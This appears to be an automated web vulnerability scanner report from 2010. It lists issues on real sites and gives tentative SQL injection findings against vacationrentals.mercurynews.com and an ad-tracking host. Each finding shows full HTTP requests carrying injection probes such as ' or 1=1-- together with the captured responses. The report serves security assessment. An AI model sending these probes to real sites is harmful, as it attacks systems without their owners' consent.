3.329. http://ads.yldmgrimg.net/apex/mediastore/062730bb-1899-481b-a0a5-5d453b885c3c [REST URL parameter 2]

3.330. http://ads.yldmgrimg.net/apex/mediastore/062730bb-1899-481b-a0a5-5d453b885c3c [REST URL parameter 3]

3.331. http://ads.yldmgrimg.net/apex/mediastore/383c4ed9-f242-4f61-b9cc-f1091f29b070 [REST URL parameter 1]

3.332. http://ads.yldmgrimg.net/apex/mediastore/383c4ed9-f242-4f61-b9cc-f1091f29b070 [REST URL parameter 2]

3.333. http://ads.yldmgrimg.net/apex/mediastore/383c4ed9-f242-4f61-b9cc-f1091f29b070 [REST URL parameter 3]

3.334. http://ads.yldmgrimg.net/apex/mediastore/52b2888f-eb6d-4556-a1ff-b178fce39ee6 [REST URL parameter 1]

3.335. http://ads.yldmgrimg.net/apex/mediastore/52b2888f-eb6d-4556-a1ff-b178fce39ee6 [REST URL parameter 2]

3.336. http://ads.yldmgrimg.net/apex/mediastore/52b2888f-eb6d-4556-a1ff-b178fce39ee6 [REST URL parameter 3]

3.337. http://ads.yldmgrimg.net/apex/mediastore/5e6edab9-925f-4cc4-ae36-5a558abc5d6a [REST URL parameter 1]

3.338. http://ads.yldmgrimg.net/apex/mediastore/5e6edab9-925f-4cc4-ae36-5a558abc5d6a [REST URL parameter 2]

3.339. http://ads.yldmgrimg.net/apex/mediastore/5e6edab9-925f-4cc4-ae36-5a558abc5d6a [REST URL parameter 3]

3.340. http://ads.yldmgrimg.net/apex/mediastore/8ba866c3-ac17-4b3d-baf7-9a95af0665d7 [REST URL parameter 1]

3.341. http://ads.yldmgrimg.net/apex/mediastore/8ba866c3-ac17-4b3d-baf7-9a95af0665d7 [REST URL parameter 2]

3.342. http://ads.yldmgrimg.net/apex/mediastore/8ba866c3-ac17-4b3d-baf7-9a95af0665d7 [REST URL parameter 3]

3.343. http://ads.yldmgrimg.net/apex/mediastore/8d3d0f79-5b47-4138-9678-2297d2caf879 [REST URL parameter 1]

3.344. http://ads.yldmgrimg.net/apex/mediastore/8d3d0f79-5b47-4138-9678-2297d2caf879 [REST URL parameter 2]

3.345. http://ads.yldmgrimg.net/apex/mediastore/8d3d0f79-5b47-4138-9678-2297d2caf879 [REST URL parameter 3]

3.346. http://ads.yldmgrimg.net/apex/mediastore/93e8d828-2c6f-42fb-b852-7b8b0226097a [REST URL parameter 1]

3.347. http://ads.yldmgrimg.net/apex/mediastore/93e8d828-2c6f-42fb-b852-7b8b0226097a [REST URL parameter 2]

3.348. http://ads.yldmgrimg.net/apex/mediastore/93e8d828-2c6f-42fb-b852-7b8b0226097a [REST URL parameter 3]

3.349. http://ads.yldmgrimg.net/apex/mediastore/99a22469-f4ac-4f28-89af-1b875134b000 [REST URL parameter 1]

3.350. http://ads.yldmgrimg.net/apex/mediastore/99a22469-f4ac-4f28-89af-1b875134b000 [REST URL parameter 2]

3.351. http://ads.yldmgrimg.net/apex/mediastore/99a22469-f4ac-4f28-89af-1b875134b000 [REST URL parameter 3]

3.352. http://ads.yldmgrimg.net/apex/mediastore/a41b7019-ffe4-4441-82ec-999ddc10ec64 [REST URL parameter 1]

3.353. http://ads.yldmgrimg.net/apex/mediastore/a41b7019-ffe4-4441-82ec-999ddc10ec64 [REST URL parameter 2]

3.354. http://ads.yldmgrimg.net/apex/mediastore/a41b7019-ffe4-4441-82ec-999ddc10ec64 [REST URL parameter 3]

3.355. http://ads.yldmgrimg.net/apex/mediastore/c3d92b61-4f57-4cda-87bb-1d308db151c3 [REST URL parameter 1]

3.356. http://ads.yldmgrimg.net/apex/mediastore/c3d92b61-4f57-4cda-87bb-1d308db151c3 [REST URL parameter 2]

3.357. http://ads.yldmgrimg.net/apex/mediastore/c3d92b61-4f57-4cda-87bb-1d308db151c3 [REST URL parameter 3]

3.358. http://ads.yldmgrimg.net/apex/mediastore/e2331a53-6c4d-4d4a-a1a0-3e7325e9fea7 [REST URL parameter 1]

3.359. http://ads.yldmgrimg.net/apex/mediastore/e2331a53-6c4d-4d4a-a1a0-3e7325e9fea7 [REST URL parameter 2]

3.360. http://ads.yldmgrimg.net/apex/mediastore/e2331a53-6c4d-4d4a-a1a0-3e7325e9fea7 [REST URL parameter 3]

3.361. http://ads.yldmgrimg.net/apex/template/swfobject.js [REST URL parameter 1]

3.362. http://ads.yldmgrimg.net/apex/template/swfobject.js [REST URL parameter 2]

3.363. http://ads.yldmgrimg.net/apex/template/swfobject.js [REST URL parameter 3]

3.364. http://optimized-by.rubiconproject.com/a/5833/7531/24864-2.js [ruid cookie]

3.365. http://optimized-by.rubiconproject.com/a/5833/7750/12853-2.js [ruid cookie]

3.366. http://optimized-by.rubiconproject.com/a/5833/7750/12853-9.js [ruid cookie]

3.367. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

3.368. http://www.airbnb.com/search/ [bev cookie]

4. Session token in URL

5. Cookie without HttpOnly flag set

5.1. http://storegrid.vembu.com/online-backup/backup-software-pricing.php

5.2. http://ad.yieldmanager.com/pixel

5.3. http://fisherinvestments.112.2o7.net/b/ss/finvfisherinvestmentscom/1/H.7-pdv-2/s58622881630435

5.4. http://pro.vembu.com/

6. Cookie scoped to parent domain

7. Cross-domain Referer leakage

7.1. http://www.fi.com/weballey/AlleyForm.aspx

7.2. http://www.fi.com/weballey/alleyletter.aspx

7.3. http://www.fi.com/weballey/alleyletter.aspx

8. Cross-domain script include

8.1. http://fi.com/

8.2. http://storegrid.vembu.com/online-backup/backup-software-pricing.php

8.3. http://storegrid.vembu.com/online-backup/computer-backup.php

8.4. http://storegrid.vembu.com/online-backup/network-backup.php

8.5. http://www.fi.com/

8.6. http://www.fi.com/weballey/AlleyForm.aspx

8.7. http://www.fi.com/weballey/alleyletter.aspx

9. Email addresses disclosed

9.1. http://pro.vembu.com/js/jquery.slideshow.js

9.2. http://storegrid.vembu.com/online-backup/backup-software-pricing.php

9.3. http://storegrid.vembu.com/online-backup/computer-backup.php

9.4. http://storegrid.vembu.com/online-backup/network-backup.php

9.5. http://www.fi.com/weballey/AlleyForm.aspx

9.6. http://www.fi.com/weballey/alleyletter.aspx

10. Private IP addresses disclosed

11. Content type incorrectly stated

11.1. http://4c28d6.r.axf8.net/mr/a.gif

11.2. http://fisherinvestments.tt.omtrdc.net/m2/fisherinvestments/mbox/standard

11.3. https://mail.google.com/mail/

11.4. http://pro.vembu.com/images/want-to-resell-button.gif

11.5. http://stats.visistat.com/conversion.php

11.6. http://www.vembu.com/border-radius.htc

11.7. http://www.vembu.com/style/style.css.php



1. SQL injection
There are 9 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://4c28d6.r.axf8.net/mr/a.gif [a parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://4c28d6.r.axf8.net
Path:   /mr/a.gif

Issue detail

The a parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the a parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /mr/a.gif?a=4C28D6'&v=1 HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: 4c28d6.r.axf8.net
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 3028
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 15 Nov 2010 02:46:01 GMT

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /mr/a.gif?a=4C28D6''&v=1 HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: 4c28d6.r.axf8.net
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 15 Nov 2010 02:46:01 GMT


1.2. http://vacationrentals.mercurynews.com/vacation-rentals/mexico+1+3 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vacationrentals.mercurynews.com
Path:   /vacation-rentals/mexico+1+3

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 11532009'%20or%201%3d1--%20 and 11532009'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /vacation-rentals/mexico+1+311532009'%20or%201%3d1--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:09:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=8ujob2uvkakdjoomnj3dec56e3; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 02:09:53 GMT
Cache-Control: post-check=0, pre-check=0
Set-Cookie: pt=MERC%7C1114101809; expires=Tue, 15-Nov-2011 02:09:53 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23032

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>San Jose Mercury News: Zimbabwe Vacation Homes, Zimbabwe Vacation Rentals, Holiday Homes, Holiday Rentals</title>
   <meta name="keywords" content="San Jose Mercury News: Zimbabwe Vacation Homes, Zimbabwe Vacation Rentals, Holiday Homes, Holiday Rentals"/>
   <meta name="description" content="San Jose Mercury News: Zimbabwe Vacation Homes, Zimbabwe Vacation Rentals, Villas, Estates, Cottages, Cabins, Condos, self-catering, Holiday Homes, Holiday Rentals"/>
   <meta name="copyright" content="Copyright &copy; 2010 Vacapedia, Inc.
All Rights Reserved."/>
<link href="/css/master.css" rel="stylesheet" type="text/css">
    <link href="/affiliates/merc/css/merc-new.css" rel="stylesheet" type="text/css">
        <script src="http://www.traveladvertising.com/Live/TanHeader.aspx?PlacementId=3" language="javascript" type="text/javascript"></script>
<script src="/affiliates/merc/js/ads_vars.js" type="text/javascript"></script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js" ></script>
</head>
<body id="vacation-rentals" class="merc yui-skin-sam">
<div id="main">
<div id="main-wrapper">
       <div id="header">
    <div id="ad-leader-board"><script type="text/javascript">
sr_adspace_id = 7728907;
sr_adspace_width = 728;
sr_adspace_height = 90;
sr_ad_new_window = true;
sr_adspace_type = "graphic";
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=7728907">
</script></div> <div id="hdrlogo">
           <div id="logo"><a href="http://www.mercurynews.com"><img alt="" border="0" src="/affiliates/merc/images/merc-logo.gif" /></a></div>
<div id="hdrmsg"><h1>Advertise your vacation rental on Bay Area News Group and reach millions of travelers</h1></div> <div id="content-top-right"><a href="https://www.vacapedia.com/own-mgr/listing.php?aff=merc">Owners Sign In</a></div>
</div>

...[SNIP]...

Request 2

GET /vacation-rentals/mexico+1+311532009'%20or%201%3d2--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:09:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=74apb49qlrm40k36lpm5uut1p7; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 02:09:53 GMT
Cache-Control: post-check=0, pre-check=0
Set-Cookie: pt=MERC%7C1114101809; expires=Tue, 15-Nov-2011 02:09:53 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22984

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>San Jose Mercury News: Vacation Homes, Vacation Rentals, Holiday Homes, Holiday Rentals</title>
   <meta name="keywords" content="San Jose Mercury News: Vacation Homes, Vacation Rentals, Holiday Homes, Holiday Rentals"/>
   <meta name="description" content="San Jose Mercury News: Vacation Homes, Vacation Rentals, Villas, Estates, Cottages, Cabins, Condos, self-catering, Holiday Homes, Holiday Rentals"/>
   <meta name="copyright" content="Copyright &copy; 2010 Vacapedia, Inc.
All Rights Reserved."/>
<link href="/css/master.css" rel="stylesheet" type="text/css">
    <link href="/affiliates/merc/css/merc-new.css" rel="stylesheet" type="text/css">
        <script src="http://www.traveladvertising.com/Live/TanHeader.aspx?PlacementId=3" language="javascript" type="text/javascript"></script>
<script src="/affiliates/merc/js/ads_vars.js" type="text/javascript"></script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js" ></script>
</head>
<body id="vacation-rentals" class="merc yui-skin-sam">
<div id="main">
<div id="main-wrapper">
       <div id="header">
    <div id="ad-leader-board"><script type="text/javascript">
sr_adspace_id = 7728907;
sr_adspace_width = 728;
sr_adspace_height = 90;
sr_ad_new_window = true;
sr_adspace_type = "graphic";
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=7728907">
</script></div> <div id="hdrlogo">
           <div id="logo"><a href="http://www.mercurynews.com"><img alt="" border="0" src="/affiliates/merc/images/merc-logo.gif" /></a></div>
<div id="hdrmsg"><h1>Advertise your vacation rental on Bay Area News Group and reach millions of travelers</h1></div> <div id="content-top-right"><a href="https://www.vacapedia.com/own-mgr/listing.php?aff=merc">Owners Sign In</a></div>
</div>
<div class="clearfix"></div>

...[SNIP]...

1.3. http://vacationrentals.mercurynews.com/vacation-rentals/united-states+california+san-diego+3+721 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vacationrentals.mercurynews.com
Path:   /vacation-rentals/united-states+california+san-diego+3+721

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 49493120'%20or%201%3d1--%20 and 49493120'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /vacation-rentals/united-states+california+san-diego+3+72149493120'%20or%201%3d1--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:09:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=631is5btcuva0jdi1p6rt3oco1; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 02:09:53 GMT
Cache-Control: post-check=0, pre-check=0
Set-Cookie: pt=MERC%7C1114101809; expires=Tue, 15-Nov-2011 02:09:53 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23062

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>San Jose Mercury News: Roquemaure Vacation Homes, Roquemaure Vacation Rentals, Holiday Homes, Holiday Rentals, Provence, France</title>
   <meta name="keywords" content="San Jose Mercury News: Roquemaure Vacation Homes, Roquemaure Vacation Rentals, Holiday Homes, Holiday Rentals"/>
   <meta name="description" content="San Jose Mercury News: Roquemaure Vacation Homes, Roquemaure Vacation Rentals, Villas, Estates, Cottages, Cabins, Condos, self-catering, Holiday Homes, Holiday Rentals"/>
   <meta name="copyright" content="Copyright &copy; 2010 Vacapedia, Inc.
All Rights Reserved."/>
<link href="/css/master.css" rel="stylesheet" type="text/css">
    <link href="/affiliates/merc/css/merc-new.css" rel="stylesheet" type="text/css">
        <script src="http://www.traveladvertising.com/Live/TanHeader.aspx?PlacementId=3" language="javascript" type="text/javascript"></script>
<script src="/affiliates/merc/js/ads_vars.js" type="text/javascript"></script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js" ></script>
</head>
<body id="vacation-rentals" class="merc yui-skin-sam">
<div id="main">
<div id="main-wrapper">
       <div id="header">
    <div id="ad-leader-board"><script type="text/javascript">
sr_adspace_id = 7728907;
sr_adspace_width = 728;
sr_adspace_height = 90;
sr_ad_new_window = true;
sr_adspace_type = "graphic";
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=7728907">
</script></div> <div id="hdrlogo">
           <div id="logo"><a href="http://www.mercurynews.com"><img alt="" border="0" src="/affiliates/merc/images/merc-logo.gif" /></a></div>
<div id="hdrmsg"><h1>Advertise your vacation rental on Bay Area News Group and reach millions of travelers</h1></div> <div id="content-top-right"><a href="https://www.vacapedia.com/own-mgr/listing.php?aff=merc">Owners Sign In</a></div>

...[SNIP]...

Request 2

GET /vacation-rentals/united-states+california+san-diego+3+72149493120'%20or%201%3d2--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:09:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=emdj4n1b4v9s40nuf30ov0hlp7; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 02:09:56 GMT
Cache-Control: post-check=0, pre-check=0
Set-Cookie: pt=MERC%7C1114101809; expires=Tue, 15-Nov-2011 02:09:56 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22988

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>San Jose Mercury News: Vacation Homes, Vacation Rentals, Holiday Homes, Holiday Rentals, , </title>
   <meta name="keywords" content="San Jose Mercury News: Vacation Homes, Vacation Rentals, Holiday Homes, Holiday Rentals"/>
   <meta name="description" content="San Jose Mercury News: Vacation Homes, Vacation Rentals, Villas, Estates, Cottages, Cabins, Condos, self-catering, Holiday Homes, Holiday Rentals"/>
   <meta name="copyright" content="Copyright &copy; 2010 Vacapedia, Inc.
All Rights Reserved."/>
<link href="/css/master.css" rel="stylesheet" type="text/css">
    <link href="/affiliates/merc/css/merc-new.css" rel="stylesheet" type="text/css">
        <script src="http://www.traveladvertising.com/Live/TanHeader.aspx?PlacementId=3" language="javascript" type="text/javascript"></script>
<script src="/affiliates/merc/js/ads_vars.js" type="text/javascript"></script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js" ></script>
</head>
<body id="vacation-rentals" class="merc yui-skin-sam">
<div id="main">
<div id="main-wrapper">
       <div id="header">
    <div id="ad-leader-board"><script type="text/javascript">
sr_adspace_id = 7728907;
sr_adspace_width = 728;
sr_adspace_height = 90;
sr_ad_new_window = true;
sr_adspace_type = "graphic";
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=7728907">
</script></div> <div id="hdrlogo">
           <div id="logo"><a href="http://www.mercurynews.com"><img alt="" border="0" src="/affiliates/merc/images/merc-logo.gif" /></a></div>
<div id="hdrmsg"><h1>Advertise your vacation rental on Bay Area News Group and reach millions of travelers</h1></div> <div id="content-top-right"><a href="https://www.vacapedia.com/own-mgr/listing.php?aff=merc">Owners Sign In</a></div>
</div>
<div class="clearfix"></div>

...[SNIP]...

1.4. http://vacationrentals.mercurynews.com/vacation-rentals/united-states+california+santa-cruz+3+749 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vacationrentals.mercurynews.com
Path:   /vacation-rentals/united-states+california+santa-cruz+3+749

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 19013238'%20or%201%3d1--%20 and 19013238'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /vacation-rentals/united-states+california+santa-cruz+3+74919013238'%20or%201%3d1--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:10:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=540tshnlgti7qttv1fhc09cdh4; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 02:10:19 GMT
Cache-Control: post-check=0, pre-check=0
Set-Cookie: pt=MERC%7C1114101810; expires=Tue, 15-Nov-2011 02:10:19 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23062

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>San Jose Mercury News: Roquemaure Vacation Homes, Roquemaure Vacation Rentals, Holiday Homes, Holiday Rentals, Provence, France</title>
   <meta name="keywords" content="San Jose Mercury News: Roquemaure Vacation Homes, Roquemaure Vacation Rentals, Holiday Homes, Holiday Rentals"/>
   <meta name="description" content="San Jose Mercury News: Roquemaure Vacation Homes, Roquemaure Vacation Rentals, Villas, Estates, Cottages, Cabins, Condos, self-catering, Holiday Homes, Holiday Rentals"/>
   <meta name="copyright" content="Copyright &copy; 2010 Vacapedia, Inc.
All Rights Reserved."/>
<link href="/css/master.css" rel="stylesheet" type="text/css">
    <link href="/affiliates/merc/css/merc-new.css" rel="stylesheet" type="text/css">
        <script src="http://www.traveladvertising.com/Live/TanHeader.aspx?PlacementId=3" language="javascript" type="text/javascript"></script>
<script src="/affiliates/merc/js/ads_vars.js" type="text/javascript"></script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js" ></script>
</head>
<body id="vacation-rentals" class="merc yui-skin-sam">
<div id="main">
<div id="main-wrapper">
       <div id="header">
    <div id="ad-leader-board"><script type="text/javascript">
sr_adspace_id = 7728907;
sr_adspace_width = 728;
sr_adspace_height = 90;
sr_ad_new_window = true;
sr_adspace_type = "graphic";
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=7728907">
</script></div> <div id="hdrlogo">
           <div id="logo"><a href="http://www.mercurynews.com"><img alt="" border="0" src="/affiliates/merc/images/merc-logo.gif" /></a></div>
<div id="hdrmsg"><h1>Advertise your vacation rental on Bay Area News Group and reach millions of travelers</h1></div> <div id="content-top-right"><a href="https://www.vacapedia.com/own-mgr/listing.php?aff=merc">Owners Sign In</a></div>

...[SNIP]...

Request 2

GET /vacation-rentals/united-states+california+santa-cruz+3+74919013238'%20or%201%3d2--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:10:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=mrkrc46cv5di0srn85dja0epn4; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 02:10:22 GMT
Cache-Control: post-check=0, pre-check=0
Set-Cookie: pt=MERC%7C1114101810; expires=Tue, 15-Nov-2011 02:10:22 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22988

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>San Jose Mercury News: Vacation Homes, Vacation Rentals, Holiday Homes, Holiday Rentals, , </title>
   <meta name="keywords" content="San Jose Mercury News: Vacation Homes, Vacation Rentals, Holiday Homes, Holiday Rentals"/>
   <meta name="description" content="San Jose Mercury News: Vacation Homes, Vacation Rentals, Villas, Estates, Cottages, Cabins, Condos, self-catering, Holiday Homes, Holiday Rentals"/>
   <meta name="copyright" content="Copyright &copy; 2010 Vacapedia, Inc.
All Rights Reserved."/>
<link href="/css/master.css" rel="stylesheet" type="text/css">
    <link href="/affiliates/merc/css/merc-new.css" rel="stylesheet" type="text/css">
        <script src="http://www.traveladvertising.com/Live/TanHeader.aspx?PlacementId=3" language="javascript" type="text/javascript"></script>
<script src="/affiliates/merc/js/ads_vars.js" type="text/javascript"></script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js" ></script>
</head>
<body id="vacation-rentals" class="merc yui-skin-sam">
<div id="main">
<div id="main-wrapper">
       <div id="header">
    <div id="ad-leader-board"><script type="text/javascript">
sr_adspace_id = 7728907;
sr_adspace_width = 728;
sr_adspace_height = 90;
sr_ad_new_window = true;
sr_adspace_type = "graphic";
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=7728907">
</script></div> <div id="hdrlogo">
           <div id="logo"><a href="http://www.mercurynews.com"><img alt="" border="0" src="/affiliates/merc/images/merc-logo.gif" /></a></div>
<div id="hdrmsg"><h1>Advertise your vacation rental on Bay Area News Group and reach millions of travelers</h1></div> <div id="content-top-right"><a href="https://www.vacapedia.com/own-mgr/listing.php?aff=merc">Owners Sign In</a></div>
</div>
<div class="clearfix"></div>

...[SNIP]...

1.5. http://vacationrentals.mercurynews.com/vacation-rentals/united-states+california+south-lake-tahoe+3+48283 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vacationrentals.mercurynews.com
Path:   /vacation-rentals/united-states+california+south-lake-tahoe+3+48283

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 97937254'%20or%201%3d1--%20 and 97937254'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /vacation-rentals/united-states+california+south-lake-tahoe+3+4828397937254'%20or%201%3d1--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:10:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=b5v5g8ir8pqa11k2egk85hkl56; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 02:10:23 GMT
Cache-Control: post-check=0, pre-check=0
Set-Cookie: pt=MERC%7C1114101810; expires=Tue, 15-Nov-2011 02:10:23 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23062

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
